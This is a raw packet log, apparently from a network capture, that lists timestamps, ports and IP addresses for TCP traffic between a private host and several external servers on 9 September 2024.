Sep 9, 2024 17:34:42.453567028 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453576088 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453587055 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453589916 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453597069 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453608036 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453613997 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453619003 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453629971 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453639030 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
                                        Sep 9, 2024 17:34:42.453649044 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.453651905 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.453659058 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.453670979 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.453706980 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.453855991 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.453901052 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.453912020 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.453922033 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.453943014 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.454020023 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.454035044 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.454045057 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.454055071 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.454063892 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.454087019 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.583755016 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.723362923 CEST491722201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:42.728449106 CEST22014917245.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:42.728499889 CEST491722201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:42.738394976 CEST491722201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:42.743194103 CEST22014917245.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:43.364830971 CEST22014917245.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:43.404170990 CEST804916195.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:43.404212952 CEST4916180192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:43.502095938 CEST22014917245.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:43.502449989 CEST491722201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:43.506380081 CEST491722201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:43.511739016 CEST22014917245.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:43.512008905 CEST491722201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:43.517652988 CEST22014917245.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:44.143558979 CEST22014917245.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:44.146373987 CEST491722201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:44.151436090 CEST22014917245.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:44.270792007 CEST22014917245.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:44.274053097 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:44.281641960 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:44.281718969 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:44.285145998 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:44.292213917 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:44.324848890 CEST4917480192.168.2.22178.237.33.50
                                        Sep 9, 2024 17:34:44.329782963 CEST8049174178.237.33.50192.168.2.22
                                        Sep 9, 2024 17:34:44.329844952 CEST4917480192.168.2.22178.237.33.50
                                        Sep 9, 2024 17:34:44.330090046 CEST4917480192.168.2.22178.237.33.50
                                        Sep 9, 2024 17:34:44.334949970 CEST8049174178.237.33.50192.168.2.22
                                        Sep 9, 2024 17:34:44.482680082 CEST491722201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:44.891030073 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:44.930260897 CEST8049174178.237.33.50192.168.2.22
                                        Sep 9, 2024 17:34:44.930336952 CEST4917480192.168.2.22178.237.33.50
                                        Sep 9, 2024 17:34:44.936639071 CEST491722201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:44.941553116 CEST22014917245.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.019310951 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.019371033 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.024657011 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.029820919 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.029881001 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.035244942 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.333771944 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.333787918 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.333800077 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.333810091 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.333821058 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.333830118 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.333841085 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.333846092 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.333846092 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.333869934 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.333873034 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.333880901 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.333911896 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.333949089 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.334549904 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.334605932 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.334645033 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.335031986 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.338696957 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.338746071 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.420562029 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.420592070 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.420602083 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.420619965 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.420633078 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.420643091 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.420672894 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.420696020 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.420730114 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.421191931 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.421200991 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.421211004 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.421228886 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.421272039 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.421282053 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.421293020 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.421303034 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.421325922 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.422177076 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.422187090 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.422199011 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.422209978 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.422210932 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.422239065 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.422585011 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.422596931 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.422622919 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.422931910 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.423105001 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.423158884 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.423170090 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.423190117 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.423219919 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.423230886 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.423252106 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.487170935 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.487185955 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.487199068 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.487225056 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.507344961 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.507379055 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.507395983 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.507399082 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.507431984 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.507438898 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.507452965 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.507466078 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.507489920 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.507514000 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.507536888 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508050919 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508090973 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.508099079 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508110046 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508122921 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508147001 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.508582115 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508620024 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.508635044 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508646965 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508660078 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508687019 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.508714914 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508752108 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.509211063 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509242058 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509253025 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509282112 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.509356022 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509366989 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509377956 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509390116 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509402990 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.509428978 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.509835958 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.510248899 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510260105 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510272026 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510302067 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.510333061 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510344028 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510354042 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510365963 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510376930 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.510401964 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.511220932 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.512176037 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.560916901 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.560951948 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.560962915 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.560997009 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.561048985 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561059952 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561072111 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561099052 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.561330080 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561367035 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.561376095 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561388016 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561422110 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.561470985 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561482906 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561492920 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561511993 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.562226057 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.562237024 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.562247992 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.562268019 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.562282085 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.562319040 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.563297987 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.572171926 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572206020 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572238922 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572263002 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.572361946 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572395086 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572413921 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.572427034 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572475910 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.594348907 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594589949 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594619989 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594655991 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594655991 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.594691992 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594708920 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.594726086 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594760895 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594774008 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.594795942 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594854116 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.595334053 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595367908 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595422983 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595424891 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.595489025 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595521927 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595541954 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.595556021 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595602989 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.596174002 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596206903 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596240997 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596256971 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.596296072 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596328974 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596342087 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.596370935 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596405983 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596419096 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.597111940 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597165108 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.597165108 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597201109 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597233057 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597249031 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.597269058 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597301006 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597316027 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.597342014 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597387075 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.598119020 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.598153114 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.598186016 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.598206043 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.598238945 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.598256111 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.598272085 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.598316908 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.637023926 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637052059 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637065887 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637077093 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637088060 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637099028 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637109995 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637109041 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.637139082 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.876897097 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.876903057 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.876957893 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.876969099 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.876997948 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.877072096 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.877082109 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.877091885 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.877103090 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.877115011 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.877119064 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.877126932 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.877145052 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.877177954 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.879080057 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.096386909 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096467972 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096520901 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096529961 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.096571922 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096606016 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096616030 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.096638918 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096673965 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096682072 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.096707106 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096739054 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096756935 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.096771955 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096803904 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096812963 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.096857071 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096889973 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096900940 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.096921921 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096955061 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.096961021 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.097006083 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097045898 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097048044 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.097078085 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097110033 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097120047 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.097143888 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097176075 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097184896 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.097206116 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097238064 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097249031 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.097271919 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097302914 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097316027 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.097336054 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097368002 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097378016 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.097400904 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097434044 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097445011 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.097487926 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097516060 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.097529888 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.097549915 CEST8049174178.237.33.50192.168.2.22
                                        Sep 9, 2024 17:34:46.097558022 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.097605944 CEST4917480192.168.2.22178.237.33.50
                                        Sep 9, 2024 17:34:46.099097967 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.099344015 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.099477053 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.099513054 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.099519968 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.099548101 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.099577904 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:46.099590063 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:46.099612951 CEST22014917345.89.247.65192.168.2.22
